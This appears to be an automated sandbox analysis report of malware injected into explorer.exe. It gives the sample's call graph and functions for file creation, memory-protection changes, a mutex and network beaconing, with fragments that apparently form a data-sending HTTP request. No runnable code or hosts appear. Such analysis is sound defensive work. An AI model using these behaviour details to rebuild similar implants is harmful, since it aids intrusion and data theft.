13530->13535 13534 df0eab2 NtProtectVirtualMemory 13531->13534 13593 df08102 13532->13593 13579 df07ee2 13533->13579 13540 df10c76 13534->13540 13537 df10c9c 13535->13537 13538 df10cbe 13535->13538 13560 df0eab2 13537->13560 13542 df10cc7 13538->13542 13543 df10cd9 13538->13543 13538->13555 13585 df07fc2 13540->13585 13545 df0eab2 NtProtectVirtualMemory 13542->13545 13546 df0eab2 NtProtectVirtualMemory 13543->13546 13543->13555 13548 df10ccf 13545->13548 13550 df10ce5 13546->13550 13547 df10cac 13571 df07de2 13547->13571 13603 df082f2 13548->13603 13621 df08712 13550->13621 13557 df06b93 13556->13557 13558 df06cb5 CreateMutexW 13557->13558 13559 df06cce 13557->13559 13558->13559 13559->13524 13562 df0eadf 13560->13562 13561 df0eef1 13561->13547 13562->13561 13563 df0eebc 13562->13563 13633 df048f2 13562->13633 13563->13547 13565 df0ee5c 13566 df048f2 NtProtectVirtualMemory 13565->13566 13567 df0ee7c 13566->13567 13568 df048f2 NtProtectVirtualMemory 13567->13568 13569 df0ee9c 13568->13569 13570 df048f2 NtProtectVirtualMemory 13569->13570 13570->13563 13573 df07df0 13571->13573 13572 df07ecd 13575 df04412 13572->13575 13573->13572 13656 df0b382 13573->13656 13576 df04440 13575->13576 13577 df04473 13576->13577 13578 df0444d CreateThread 13576->13578 13577->13555 13578->13555 13581 df07f06 13579->13581 13580 df07fa4 13580->13555 13581->13580 13582 df048f2 NtProtectVirtualMemory 13581->13582 13583 df07f9c 13582->13583 13584 df0b382 ObtainUserAgentString 13583->13584 13584->13580 13588 df08016 13585->13588 13586 df080e8 13587 df0b382 ObtainUserAgentString 13586->13587 13589 df080f0 13587->13589 13588->13589 13590 df048f2 NtProtectVirtualMemory 13588->13590 13591 df080bb 13588->13591 13589->13555 13590->13591 13591->13586 13592 df048f2 NtProtectVirtualMemory 13591->13592 13592->13586 13595 df08137 13593->13595 13594 df082d5 13594->13555 13595->13594 13596 df048f2 NtProtectVirtualMemory 13595->13596 13597 df0828a 13596->13597 13598 df048f2 NtProtectVirtualMemory 13597->13598 13601 df082a9 13598->13601 13599 df082cd 13600 df0b382 ObtainUserAgentString 13599->13600 13600->13594 13601->13599 13602 df048f2 NtProtectVirtualMemory 13601->13602 13602->13599 13604 df08349 13603->13604 13605 df0849f 13604->13605 13607 df048f2 NtProtectVirtualMemory 13604->13607 13606 df048f2 NtProtectVirtualMemory 13605->13606 13610 df084c3 13605->13610 13606->13610 13608 df08480 13607->13608 13609 df048f2 NtProtectVirtualMemory 13608->13609 13609->13605 13611 df048f2 NtProtectVirtualMemory 13610->13611 13612 df08597 13610->13612 13611->13612 13613 df048f2 NtProtectVirtualMemory 13612->13613 13614 df085bf 13612->13614 13613->13614 13618 df048f2 NtProtectVirtualMemory 13614->13618 13619 df086b9 13614->13619 13615 df086e1 13616 df0b382 ObtainUserAgentString 13615->13616 13617 df086e9 13616->13617 13617->13555 13618->13619 13619->13615 13620 df048f2 NtProtectVirtualMemory 13619->13620 13620->13615 13622 df08767 13621->13622 13623 df048f2 NtProtectVirtualMemory 13622->13623 13628 df08903 13622->13628 13624 df088e3 13623->13624 13625 df048f2 NtProtectVirtualMemory 13624->13625 13625->13628 13626 df089b7 13629 df0b382 ObtainUserAgentString 13626->13629 13627 df08992 13627->13626 13632 df048f2 NtProtectVirtualMemory 13627->13632 13628->13627 13631 df048f2 NtProtectVirtualMemory 13628->13631 13630 df089bf 13629->13630 13630->13555 13631->13627 13632->13626 13634 df04987 13633->13634 13638 df049b2 13634->13638 13648 df05622 13634->13648 13636 df04ba2 13637 df10e12 NtProtectVirtualMemory 13636->13637 13647 df04b5b 13637->13647 13638->13636 13639 df04ac5 13638->13639 13641 df04c0c 13638->13641 13652 df10e12 13639->13652 13641->13565 13642 df10e12 NtProtectVirtualMemory 13642->13641 13643 df04ae3 13643->13641 13644 df04b3d 13643->13644 13645 df10e12 NtProtectVirtualMemory 13643->13645 13646 df10e12 NtProtectVirtualMemory 13644->13646 13645->13644 13646->13647 13647->13641 13647->13642 13649 df0567a 13648->13649 13650 df10e12 NtProtectVirtualMemory 13649->13650 13651 df0567e 13649->13651 13650->13649 13651->13638 13653 df0f942 13652->13653 13654 df10e45 NtProtectVirtualMemory 13653->13654 13655 df10e70 13654->13655 13655->13643 13657 df0b3c7 13656->13657 13660 df0b232 13657->13660 13659 df0b438 13659->13572 13661 df0b25e 13660->13661 13664 df0a8c2 13661->13664 13663 df0b26b 13663->13659 13666 df0a934 13664->13666 13665 df0a9a6 13665->13663 13666->13665 13667 df0a995 ObtainUserAgentString 13666->13667 13667->13665 13846 df0c72e 13847 df0c788 connect 13846->13847 13848 df0c76a 13846->13848 13848->13847 13955 df0542e 13956 df0545b 13955->13956 13964 df054c9 13955->13964 13957 df0f232 NtCreateFile 13956->13957 13956->13964 13958 df05496 13957->13958 13959 df054c5 13958->13959 13960 df05082 NtCreateFile 13958->13960 13961 df0f232 NtCreateFile 13959->13961 13959->13964 13962 df054b6 13960->13962 13961->13964 13962->13959 13963 df04f52 NtCreateFile 13962->13963 13963->13959 13515 df10e12 13519 df0f942 13515->13519 13517 df10e45 NtProtectVirtualMemory 13518 df10e70 13517->13518 13520 df0f967 13519->13520 13520->13517 13965 df05613 13967 df05620 13965->13967 13966 df0567e 13967->13966 13968 df10e12 NtProtectVirtualMemory 13967->13968 13968->13967 13909 df09cd4 13911 df09cd8 13909->13911 13910 df0a022 13911->13910 13912 df09352 NtCreateFile 13911->13912 13913 df09f0d 13912->13913 13913->13910 13914 df09792 NtCreateFile 13913->13914 13914->13913 13781 df07dd9 13783 df07df0 13781->13783 13782 df07ecd 13783->13782 13784 df0b382 ObtainUserAgentString 13783->13784 13784->13782 13668 df042dd 13672 df0431a 13668->13672 13669 df043fa 13670 df04328 SleepEx 13670->13670 13670->13672 13672->13669 13672->13670 13675 df0ef12 13672->13675 13684 df05432 13672->13684 13694 df040f2 13672->13694 13678 df0ef48 13675->13678 13676 df0f134 13676->13672 13677 df0f232 NtCreateFile 13677->13678 13678->13676 13678->13677 13683 df0f0e9 13678->13683 13700 df0ff82 13678->13700 13680 df0f125 13720 df0e922 13680->13720 13683->13680 13712 df0e842 13683->13712 13685 df0545b 13684->13685 13693 df054c9 13684->13693 13686 df0f232 NtCreateFile 13685->13686 13685->13693 13687 df05496 13686->13687 13692 df054c5 13687->13692 13732 df05082 13687->13732 13689 df0f232 NtCreateFile 13689->13693 13690 df054b6 13690->13692 13741 df04f52 13690->13741 13692->13689 13692->13693 13693->13672 13695 df04109 13694->13695 13696 df041d3 13694->13696 13746 df04012 13695->13746 13696->13672 13698 df04113 13698->13696 13699 df0ff82 6 API calls 13698->13699 13699->13696 13701 df0ffb8 13700->13701 13702 df0c5b2 socket 13701->13702 13703 df10081 13701->13703 13711 df10022 13701->13711 13702->13703 13704 df10134 13703->13704 13706 df10117 getaddrinfo 13703->13706 13703->13711 13705 df0c732 connect 13704->13705 13707 df101b2 13704->13707 13704->13711 13705->13707 13706->13704 13708 df0c6b2 send 13707->13708 13707->13711 13710 df10729 13708->13710 13709 df107f4 setsockopt recv 13709->13711 13710->13709 13710->13711 13711->13678 13713 df0e86d 13712->13713 13728 df0f232 13713->13728 13715 df0e906 13715->13683 13716 df0e888 13716->13715 13717 df0ff82 6 API calls 13716->13717 13718 df0e8c5 13716->13718 13717->13718 13718->13715 13719 df0f232 NtCreateFile 13718->13719 13719->13715 13721 df0e9c2 13720->13721 13722 df0f232 NtCreateFile 13721->13722 13724 df0e9d6 13722->13724 13723 df0ea9f 13723->13676 13724->13723 13725 df0ea5d 13724->13725 13727 df0ff82 6 API calls 13724->13727 13725->13723 13726 df0f232 NtCreateFile 13725->13726 13726->13723 13727->13725 13730 df0f25c 13728->13730 13731 df0f334 13728->13731 13729 df0f410 NtCreateFile 13729->13731 13730->13729 13730->13731 13731->13716 13733 df05420 13732->13733 13734 df050aa 13732->13734 13733->13690 13734->13733 13735 df0f232 NtCreateFile 13734->13735 13737 df051f9 13735->13737 13736 df053df 13736->13690 13737->13736 13738 df0f232 NtCreateFile 13737->13738 13739 df053c9 13738->13739 13740 df0f232 NtCreateFile 13739->13740 13740->13736 13742 df04f70 13741->13742 13743 df04f84 13741->13743 13742->13692 13744 df0f232 NtCreateFile 13743->13744 13745 df05046 13744->13745 13745->13692 13748 df04031 13746->13748 13747 df040cd 13747->13698 13748->13747 13749 df0ff82 6 API calls 13748->13749 13749->13747 13915 df07edd 13917 df07f06 13915->13917 13916 df07fa4 13917->13916 13918 df048f2 NtProtectVirtualMemory 13917->13918 13919 df07f9c 13918->13919 13920 df0b382 ObtainUserAgentString 13919->13920 13920->13916 13969 df11a1f 13970 df11a25 13969->13970 13973 df055f2 13970->13973 13972 df11a3d 13974 df055fb 13973->13974 13975 df0560e 13973->13975 13974->13975 13976 df0a662 6 API calls 13974->13976 13975->13972 13976->13975 13490 df0ff82 13491 df0ffb8 13490->13491 13493 df10081 13491->13493 13501 df10022 13491->13501 13502 df0c5b2 13491->13502 13494 df10134 13493->13494 13496 df10117 getaddrinfo 13493->13496 13493->13501 13497 df101b2 13494->13497 13494->13501 13505 df0c732 13494->13505 13496->13494 13497->13501 13508 df0c6b2 13497->13508 13499 df107f4 setsockopt recv 13499->13501 13500 df10729 13500->13499 13500->13501 13503 df0c60a socket 13502->13503 13504 df0c5ec 13502->13504 13503->13493 13504->13503 13506 df0c788 connect 13505->13506 13507 df0c76a 13505->13507 13506->13497 13507->13506 13509 df0c705 send 13508->13509 13510 df0c6e7 13508->13510 13509->13500 13510->13509 13830 df0914a 13831 df09153 13830->13831 13833 df09174 13830->13833 13834 df0b382 ObtainUserAgentString 13831->13834 13832 df091e7 13833->13832 13838 df041f2 13833->13838 13835 df0916c 13834->13835 13836 df040f2 6 API calls 13835->13836 13836->13833 13839 df042c9 13838->13839 13840 df0420f 13838->13840 13839->13833 13841 df0ef12 7 API calls 13840->13841 13842 df04242 13840->13842 13841->13842 13843 df04289 13842->13843 13845 df05432 NtCreateFile 13842->13845 13843->13839 13844 df040f2 6 API calls 13843->13844 13844->13839 13845->13843 13977 df10e0a 13978 df10e45 NtProtectVirtualMemory 13977->13978 13979 df0f942 13977->13979 13980 df10e70 13978->13980 13979->13978 13937 df11a4d 13938 df11a53 13937->13938 13941 df05782 13938->13941 13940 df11a6b 13942 df0578f 13941->13942 13943 df057ad 13942->13943 13944 df0a662 6 API calls 13942->13944 13943->13940 13944->13943

                                                                                                                    Executed Functions

                                                                                                                    Function 0DF0FF82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815networkCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 0 df0ff82-df0ffb6 1 df0ffd6-df0ffd9 0->1 2 df0ffb8-df0ffbc 0->2 4 df108fe-df1090c 1->4 5 df0ffdf-df0ffed 1->5 2->1 3 df0ffbe-df0ffc2 2->3 3->1 8 df0ffc4-df0ffc8 3->8 6 df0fff3-df0fff7 5->6 7 df108f6-df108f7 5->7 9 df0fff9-df0fffd 6->9 10 df0ffff-df10000 6->10 7->4 8->1 11 df0ffca-df0ffce 8->11 9->10 12 df1000a-df10010 9->12 10->12 11->1 13 df0ffd0-df0ffd4 11->13 14 df10012-df10020 12->14 15 df1003a-df10060 12->15 13->1 13->5 14->15 16 df10022-df10026 14->16 17 df10062-df10066 15->17 18 df10068-df1007c call df0c5b2 15->18 16->7 19 df1002c-df10035 16->19 17->18 20 df100a8-df100ab 17->20 22 df10081-df100a2 18->22 19->7 23 df100b1-df100b8 20->23 24 df10144-df10150 20->24 22->20 26 df108ee-df108ef 22->26 27 df100e2-df100f5 23->27 28 df100ba-df100dc call df0f942 23->28 25 df10156-df10165 24->25 24->26 30 df10167-df10178 call df0c552 25->30 31 df1017f-df1018f 25->31 26->7 27->26 29 df100fb-df10101 27->29 28->27 29->26 34 df10107-df10109 29->34 30->31 36 df10191-df101ad call df0c732 31->36 37 df101e5-df1021b 31->37 34->26 40 df1010f-df10111 34->40 47 df101b2-df101da 36->47 38 df1022d-df10231 37->38 39 df1021d-df1022b 37->39 44 df10233-df10245 38->44 45 df10247-df1024b 38->45 43 df1027f-df10280 39->43 40->26 46 df10117-df10132 getaddrinfo 40->46 52 df10283-df102e0 call df10d62 call df0d482 call df0ce72 call df11002 43->52 44->43 49 df10261-df10265 45->49 50 df1024d-df1025f 45->50 46->24 51 df10134-df1013c 46->51 47->37 48 df101dc-df101e1 47->48 48->37 53 df10267-df1026b 49->53 54 df1026d-df10279 49->54 50->43 51->24 63 df102e2-df102e6 52->63 64 df102f4-df10354 call df10d92 52->64 53->52 53->54 54->43 63->64 65 df102e8-df102ef call df0d042 63->65 69 df1035a-df10396 call df10d62 call df11262 call df11002 64->69 70 df1048c-df104b8 call df10d62 call df11262 64->70 65->64 84 df10398-df103b7 call df11262 call df11002 69->84 85 df103bb-df103e9 call df11262 * 2 69->85 79 df104d9-df10590 call df11262 * 3 call df11002 * 2 call df0d482 70->79 80 df104ba-df104d5 70->80 109 df10595-df105b9 call df11262 79->109 80->79 84->85 101 df10415-df1041d 85->101 102 df103eb-df10410 call df11002 call df11262 85->102 103 df10442-df10448 101->103 104 df1041f-df10425 101->104 102->101 103->109 110 df1044e-df10456 103->110 107 df10467-df10487 call df11262 104->107 108 df10427-df1043d 104->108 107->109 108->109 120 df105d1-df106ad call df11262 * 7 call df11002 call df10d62 call df11002 call df0ce72 call df0d042 109->120 121 df105bb-df105cc call df11262 call df11002 109->121 110->109 113 df1045c-df1045d 110->113 113->107 132 df106af-df106b3 120->132 121->132 134 df106b5-df106fa call df0c382 call df0c7b2 132->134 135 df106ff-df1072d call df0c6b2 132->135 153 df108e6-df108e7 134->153 144 df1075d-df10761 135->144 145 df1072f-df10735 135->145 150 df10767-df1076b 144->150 151 df1090d-df10913 144->151 145->144 149 df10737-df1074c 145->149 149->144 154 df1074e-df10754 149->154 157 df10771-df10773 150->157 158 df108aa-df108df call df0c7b2 150->158 155 df10779-df10784 151->155 156 df10919-df10920 151->156 153->26 154->144 163 df10756 154->163 159 df10795-df10796 155->159 160 df10786-df10793 155->160 156->160 157->155 157->158 158->153 164 df1079c-df107a0 159->164 160->159 160->164 163->144 167 df107b1-df107b2 164->167 168 df107a2-df107af 164->168 170 df107b8-df107c4 167->170 168->167 168->170 173 df107f4-df10861 setsockopt recv 170->173 174 df107c6-df107ef call df10d92 call df10d62 170->174 177 df108a3-df108a4 173->177 178 df10863 173->178 174->173 177->158 178->177 181 df10865-df1086a 178->181 181->177 184 df1086c-df10872 181->184 184->177 186 df10874-df108a1 184->186 186->177 186->178
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838922419.000000000DED0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ded0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: getaddrinforecvsetsockopt
                                                                                                                    • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                                                    • API String ID: 1564272048-1117930895
                                                                                                                    • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                    • Instruction ID: 54cfd230e40a209d9f7350c9c4fec27dbb57d652c1da41e86b381463f69f5362
                                                                                                                    • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                    • Instruction Fuzzy Hash: FA528F34618B488BCB69EF6CC8947E9B7E1FB54300F51862ED59FC7186DE30A985CB81
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DF0F232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 299 df0f232-df0f256 300 df0f25c-df0f260 299->300 301 df0f8bd-df0f8cd 299->301 300->301 302 df0f266-df0f2a0 300->302 303 df0f2a2-df0f2a6 302->303 304 df0f2bf 302->304 303->304 306 df0f2a8-df0f2ac 303->306 305 df0f2c6 304->305 307 df0f2cb-df0f2cf 305->307 308 df0f2b4-df0f2b8 306->308 309 df0f2ae-df0f2b2 306->309 310 df0f2d1-df0f2f7 call df0f942 307->310 311 df0f2f9-df0f30b 307->311 308->307 312 df0f2ba-df0f2bd 308->312 309->305 310->311 316 df0f378 310->316 311->316 317 df0f30d-df0f332 311->317 312->307 318 df0f37a-df0f3a0 316->318 319 df0f3a1-df0f3a8 317->319 320 df0f334-df0f33b 317->320 321 df0f3d5-df0f3dc 319->321 322 df0f3aa-df0f3d3 call df0f942 319->322 323 df0f366-df0f370 320->323 324 df0f33d-df0f360 call df0f942 320->324 326 df0f410-df0f458 NtCreateFile call df0f172 321->326 327 df0f3de-df0f40a call df0f942 321->327 322->316 322->321 323->316 329 df0f372-df0f373 323->329 324->323 335 df0f45d-df0f45f 326->335 327->316 327->326 329->316 335->316 336 df0f465-df0f46d 335->336 336->316 337 df0f473-df0f476 336->337 338 df0f486-df0f48d 337->338 339 df0f478-df0f481 337->339 340 df0f4c2-df0f4ec 338->340 341 df0f48f-df0f4b8 call df0f942 338->341 339->318 347 df0f4f2-df0f4f5 340->347 348 df0f8ae-df0f8b8 340->348 341->316 346 df0f4be-df0f4bf 341->346 346->340 349 df0f604-df0f611 347->349 350 df0f4fb-df0f4fe 347->350 348->316 349->318 352 df0f500-df0f507 350->352 353 df0f55e-df0f561 350->353 357 df0f538-df0f559 352->357 358 df0f509-df0f532 call df0f942 352->358 354 df0f616-df0f619 353->354 355 df0f567-df0f572 353->355 359 df0f6b8-df0f6bb 354->359 360 df0f61f-df0f626 354->360 362 df0f5a3-df0f5a6 355->362 363 df0f574-df0f59d call df0f942 355->363 361 df0f5e9-df0f5fa 357->361 358->316 358->357 370 df0f739-df0f73c 359->370 371 df0f6bd-df0f6c4 359->371 366 df0f657-df0f66b call df10e92 360->366 367 df0f628-df0f651 call df0f942 360->367 361->349 362->316 369 df0f5ac-df0f5b6 362->369 363->316 363->362 366->316 388 df0f671-df0f6b3 366->388 367->316 367->366 369->316 377 df0f5bc-df0f5e6 369->377 374 df0f742-df0f749 370->374 375 df0f7c4-df0f7c7 370->375 378 df0f6f5-df0f734 371->378 379 df0f6c6-df0f6ef call df0f942 371->379 382 df0f77a-df0f7bf 374->382 383 df0f74b-df0f774 call df0f942 374->383 375->316 384 df0f7cd-df0f7d4 375->384 377->361 394 df0f894-df0f8a9 378->394 379->348 379->378 382->394 383->348 383->382 390 df0f7d6-df0f7f6 call df0f942 384->390 391 df0f7fc-df0f803 384->391 388->318 390->391 392 df0f805-df0f825 call df0f942 391->392 393 df0f82b-df0f835 391->393 392->393 393->348 400 df0f837-df0f83e 393->400 394->318 400->348 403 df0f840-df0f886 400->403 403->394
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838922419.000000000DED0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ded0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID: `
                                                                                                                    • API String ID: 823142352-2679148245
                                                                                                                    • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                    • Instruction ID: 9630c0a45087f1b6bd1bd5a10cc2d7230cf367c0e2254dc549b32800b8cc40ae
                                                                                                                    • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                                                    • Instruction Fuzzy Hash: 55222D70A18A099FCB69DF2CC4996A9FBE1FF58305F50822ED45ED3290DB30E451DB81
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DF10E12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 443 df10e12-df10e6e call df0f942 NtProtectVirtualMemory 446 df10e70-df10e7c 443->446 447 df10e7d-df10e8f 443->447
                                                                                                                    APIs
                                                                                                                    • NtProtectVirtualMemory.NTDLL ref: 0DF10E67
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838922419.000000000DED0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ded0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MemoryProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2706961497-0
                                                                                                                    • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                    • Instruction ID: fcc2e3cacd2547bbbb22286a17cbbd2ca2ee8f27320a1bf22eca349dbddd208b
                                                                                                                    • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                                                    • Instruction Fuzzy Hash: 02019E34628B484F8B88EF6CD48062AB7E4FBD9214F000B3EA99AC3250EB60D5418782
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DF10E0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 448 df10e0a-df10e38 449 df10e45-df10e6e NtProtectVirtualMemory 448->449 450 df10e40 call df0f942 448->450 451 df10e70-df10e7c 449->451 452 df10e7d-df10e8f 449->452 450->449
                                                                                                                    APIs
                                                                                                                    • NtProtectVirtualMemory.NTDLL ref: 0DF10E67
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838922419.000000000DED0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ded0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MemoryProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2706961497-0
                                                                                                                    • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                    • Instruction ID: 8d15d1c6741f177ed4696a64429cbb5bf181ca39f54e14dc91e5ec6e62c8abe6
                                                                                                                    • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                                                    • Instruction Fuzzy Hash: 5001A23462CB884B8B48EB2C94416A6B7E5FBCE314F004B3EE99AC3240DB21D5028782
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DF0A8C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • ObtainUserAgentString.URLMON ref: 0DF0A9A0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838922419.000000000DED0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ded0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AgentObtainStringUser
                                                                                                                    • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                    • API String ID: 2681117516-319646191
                                                                                                                    • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                    • Instruction ID: a6343ea8a1628cc35227d3d2e2a78c0b0454c3b99167d9baeddb51d45d18eb95
                                                                                                                    • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                    • Instruction Fuzzy Hash: 0D31D131A14A4D8BCB04EFA8C8847EDBBE0FF58205F45422AE54ED7240DE74CA45C789
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DF0A8BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • ObtainUserAgentString.URLMON ref: 0DF0A9A0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838922419.000000000DED0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ded0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AgentObtainStringUser
                                                                                                                    • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                    • API String ID: 2681117516-319646191
                                                                                                                    • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                    • Instruction ID: ab1612027d8368dad03f27be70ba15cfae0ec38bd81b261ac1a1706884372e54
                                                                                                                    • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                    • Instruction Fuzzy Hash: 8721D030A14B4D8BCB04EFA8C8847EDBBE0FF58205F41822AE55AD7240DF74CA45CB89
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DF06B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148synchronizationCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 232 df06b66-df06b68 233 df06b93-df06bb8 232->233 234 df06b6a-df06b71 232->234 236 df06bbb-df06c22 call df0d612 call df0f942 * 2 233->236 234->236 237 df06b73-df06b92 234->237 244 df06c28-df06c2b 236->244 245 df06cdc 236->245 237->233 244->245 246 df06c31-df06cd3 call df11da4 call df11022 call df113e2 call df11022 call df113e2 CreateMutexW 244->246 247 df06cde-df06cf6 245->247 246->245 261 df06cd5-df06cda 246->261 261->247
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838922419.000000000DED0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ded0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateMutex
                                                                                                                    • String ID: .dll$el32$kern
                                                                                                                    • API String ID: 1964310414-1222553051
                                                                                                                    • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                    • Instruction ID: 52c23298a5dbc2170f8729f6217bc8ef74a6e484f020a947ec174d4446a1ebfb
                                                                                                                    • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                                                    • Instruction Fuzzy Hash: E7416C70918A088FDB54EFA8C8947AD7BE0FF58300F05827AD94EDB295DE30D945CB85
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DF06B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138synchronizationCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.3838922419.000000000DED0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0DED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_ded0000_explorer.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateMutex
                                                                                                                    • String ID: .dll$el32$kern
                                                                                                                    • API String ID: 1964310414-1222553051
                                                                                                                    • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                    • Instruction ID: 38040837baf4076c34a7c530423f06544e3c91188a700499cc1428557ad82879
                                                                                                                    • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                                                    • Instruction Fuzzy Hash: ED413C74918A088FDB54EFA8C894BAD7BE0FF68300F05816AD94EDB255DE30D945CB85
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0DF0C72E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 289 df0c72e-df0c768 290 df0c788-df0c7ab connect 289->290 291 df0c76a-df0c782 call df0f942 289->291 291->290
                                                                                                                    APIs
